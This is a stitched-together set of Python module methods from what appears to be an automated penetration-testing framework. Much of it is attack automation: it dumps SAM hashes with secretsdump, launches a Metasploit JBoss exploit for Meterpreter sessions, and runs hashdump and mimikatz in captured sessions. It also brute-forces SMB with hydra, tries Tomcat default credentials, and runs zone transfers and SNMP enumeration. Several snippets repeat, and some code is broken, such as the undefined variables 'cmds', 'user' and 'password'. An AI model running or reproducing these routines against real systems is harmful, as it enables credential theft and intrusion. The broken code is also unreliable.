def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = self.getUsers(t) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password']) for password in passwords: self.display.verbose(self.shortName + " - Connecting to " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr( 10) # run secretesdump.py command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \ "\"@" + t result = Utils.execWait(command, None) if Utils.isReadable(temp_file + '.sam'): with open (temp_file + '.sam', "r") as myfile: result=myfile.readlines() for line in result: m = line.split(':') user = m[0].strip() uid = m[1].strip() lmhash = m[2].strip() ntlmhash = m[3].strip() kb.add("creds/host/" + t + "/username/" + user + "/lmhash/" + lmhash) kb.add("creds/host/" + t + "/username/" + user + "/ntlmhash/" + ntlmhash) kb.add("creds/host/" + t + "/username/" + user + "/fullhash/" + lmhash + ":" + ntlmhash) self.fire("newNTLMHash") return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for community in cstrings: command = self.config["snmpwalk"] + " -v 2c -c " + community + " " + t result = command + "\n" + Utils.execWait(command) #append command to top of output outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F")) return
def testTarget(self, host, port): success = False # verify we have not tested this host before if not self.seentarget(host + str(port)): self.addseentarget(host + str(port)) # test for anonumous ftp success = self.searchTarget(host, port, "anonymous", "*****@*****.**") # test for user accounts if (not success): # get list of user creds for this host users = self.getUsers(host) # loop over each set of credentials for username in users: passwords = kb.get('host/' + host + '/user/' + username + '/password') for password in passwords: if (searchTarget(host, port, username, password)): return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: cmd = { 'config': [ "use exploit/multi/http/jboss_maindeployer", "set RHOST %s" % t, "set RPORT %s" % p, "set SVHOST %s" % self.config['lhost'], "set target 2", "set fingerprintcheck false" ], 'payload': 'linux' } result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln( t, self.shortName, { "port": p, "username": user, "password": password, "output": outfile.replace("/", "%2F") }) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) if callFire: self.fire("msfSession") return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t + p): # add the new IP to the already seen list self.addseentarget(t + p) cmd = { 'config': [ "use auxiliary/scanner/http/tomcat_mgr_login", "set RHOSTS %s" % t, "set RPORT %s" % p ], 'payload': 'win' } result, outfile = self.msfExec(t, cmds) for line in result.splitlines(): m = re.match(r'.*Successful: (.*):(.*)', line) if (m): self.display.error("Tomcat on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() + "]/[" + m.group(2).strip() + "]") kb.add("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newTomcatPassword") # clean up after ourselves result = msf.cleanup() return
def testTarget(self, host, port): success = False # verify we have not tested this host before if not self.seentarget(host + str(port)): self.addseentarget(host + str(port)) # test for anonumous ftp success = self.searchTarget(host, port, "anonymous", "*****@*****.**") # test for user accounts if (not success): # get list of user creds for this host users = self.getUsers(host) # loop over each set of credentials for username in users: passwords = kb.get('host/' + host + '/user/' + username + '/password') for password in passwords: if (searchTarget(host, port, username, password)): return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new target to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Targetting " + t) # Find NS records ns_list = kb.get('osint/dnsdomain/' + t + '/NS/') ns_list2 = MyDNS.getRecord(t, "NS") for n in ns_list2: n = str(n)[:-1] ns_list.append(n) for ns in ns_list: try: xfr = MyDNS.getZoneXfr(ns, t) text = "" for k in xfr: text += xfr[k].to_text(k) + "\n" self.processZoneLine(xfr[k].to_text(k), t) if text: # make outfile outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + ns + "_" + Utils.getRandStr( 10) # output to file Utils.writeFile(text, outfile) self.fire("newDNSZoneXfr") except Exception as e: print e return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) command = self.config[ "hydra"] + " -s 445 -l " + user + " -P " + self.config[ "miscDir"] + "passwords.txt smb://" + t result = Utils.execWait(command, temp_file, timeout=30) # Extract usernames & passwords from results and add to KB parts = re.findall( ".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result) for part in parts: self.fire("newSmbPassword") self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")}) self.display.debug("Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t) kb.add("host/" + t + "/user/" + part[0].strip() + "/password/" + part[1].strip()) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get(['service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport']) for port in ports: # verify we have not tested this host before if not self.seentarget(t + str(port)): # add the new IP to the already seen list self.addseentarget(t + str(port)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) command = "java -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port result = Utils.execWait(command, temp_file, timeout=30) # TODO - parse output and store results? # print result return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) cmd = { 'config': [ "sessions -i %s" % str(s), "SLEEP", "hashdump", "SLEEP", "background", "SLEEP" ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) cmd = { 'config': [ "sessions -i %s" % str(s), "SLEEP", "load mimikatz", "SLEEP", "wdigest", "SLEEP", "background", "SLEEP" ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: cmd = { 'config': [ "use auxiliary/scanner/snmp/snmp_enumusers", "set RHOSTS %s" % t, "set COMMUNITY %s" % comString ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("creds/host/" + t + "/username/" + username.strip()) return
def getTargets(self): # we are interested only in the hosts that had nullsessions self.targets = kb.get('host/*/msfSession')
def getTargets(self): self.targets = kb.get('port/tcp/111', 'port/udp/111')
def getTargets(self): self.targets = kb.get(['host/*/tcpport/5800', 'host/*/tcpport/5900'])
def getTargets(self): self.targets = kb.get('service/ldap')
def getTargets(self): # we are interested in all hosts self.targets = kb.get('host/*/tcpport/21') self.targets2 = kb.get('service/ftp/host')
def getTargets(self): # we are interested in all hosts self.targets = kb.get('port/tcp/445', 'port/tcp/139') self.targets2 = kb.get('service/smb')
def getTargets(self): self.targets = kb.get(['host/*/tcpport/139', 'host/*/tcpport/445'])
def getTargets(self): self.targets = kb.get('host/*/tcpport/111')
def getTargets(self): # we are interested only in the hosts that have UDP 161 open self.targets = kb.get('host/*/vuln/snmpCred')
def getTargets(self): # we are interested in all hosts self.targets = kb.get('host/*/tcpport/21') self.targets2 = kb.get('service/ftp/host')
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp') for port in ports: # verify we have not tested this host before if not self.seentarget(t + str(port)): # add the new IP to the already seen list self.addseentarget(t + str(port)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) command = self.config["sslscan"] + " --no-color " + t + ":" + port result = Utils.execWait(command, temp_file, timeout=60) depricatedlist = [] weakciphers = [] keystrength = "" with open (temp_file, "r") as myfile: result=myfile.readlines() for line in result: m = re.match(r'^\s*Accepted\s\s+([^ ]*)\s\s*(\d\d*)\s\s*bits\s*([^ ]*)', line) if (m): protocol = m.group(1).strip() bit = m.group(2).strip() cipher = m.group(3).strip() if (protocol == "SSLv2"): if protocol not in depricatedlist: depricatedlist.append(protocol) elif (protocol == "SSLv3"): if protocol not in depricatedlist: depricatedlist.append(protocol) elif (protocol == "TLSv1.0"): if protocol not in depricatedlist: depricatedlist.append(protocol) elif (protocol == "TLSv1.1"): if protocol not in depricatedlist: depricatedlist.append(protocol) elif (protocol == "TLSv1.2"): if "DES" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) elif "RSA" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) elif "NULL" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) elif int(bit) < 112: if cipher not in weakciphers: weakciphers.append(cipher) else: m = re.match(r'^\s*RSA Key Strength:\s*(\d\d*)', line) if (m): if int(m.group(1).strip()) < 2048: keystrength = m.group(1).strip() # store data into KB for depricatedProto in depricatedlist: kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto) for weakCipher in weakciphers: kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher) if keystrength is not "": kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength) # improve the output self.display.debug(t + "," + str(port) + "," + ' '.join(depricatedlist) + "," + ' '.join( weakciphers) + "," + keystrength) return
def getTargets(self): self.targets = kb.get('service/https', 'service/ssl')
def getTargets(self): self.targets = kb.get(['host/*/tcpport/389', 'host/*/udpport/389'])
def getTargets(self): self.targets = kb.get('port/tcp/5800', 'port/tcp/5900')
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp') for port in ports: # verify we have not tested this host before if not self.seentarget(t + str(port)): # add the new IP to the already seen list self.addseentarget(t + str(port)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) command = self.config["java"] + " -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port result = Utils.execWait(command, temp_file, timeout=30) depricatedlist = [] weakciphers = [] keystrength = "" tls12 = False with open (temp_file, "r") as myfile: result=myfile.readlines() for line in result: if (tls12): m = re.match(r'^ (.*)', line) if (m): cipher = line.strip() if "DES" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) elif "RSA" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) elif "NULL" in cipher: if cipher not in weakciphers: weakciphers.append(cipher) else: tls12 = False else: m = re.match(r'^\s*Supported versions: (.*)', line) if (m): if ("SSLv2" in m.group(1)): protocol = "SSLv2" if protocol not in depricatedlist: depricatedlist.append(protocol) elif ("SSLv3" in m.group(1)): protocol = "SSLv3" if protocol not in depricatedlist: depricatedlist.append(protocol) elif ("TLSv1.0" in m.group(1)): protocol = "TLSv1.0" if protocol not in depricatedlist: depricatedlist.append(protocol) elif ("TLSv1.1" in m.group(1)): protocol = "TLSv1.1" if protocol not in depricatedlist: depricatedlist.append(protocol) m = re.match(r'^ TLSv1.2\s*', line) if (m): tls12 = True # store data into KB for depricatedProto in depricatedlist: kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto) for weakCipher in weakciphers: kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher) if keystrength is not "": kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength) return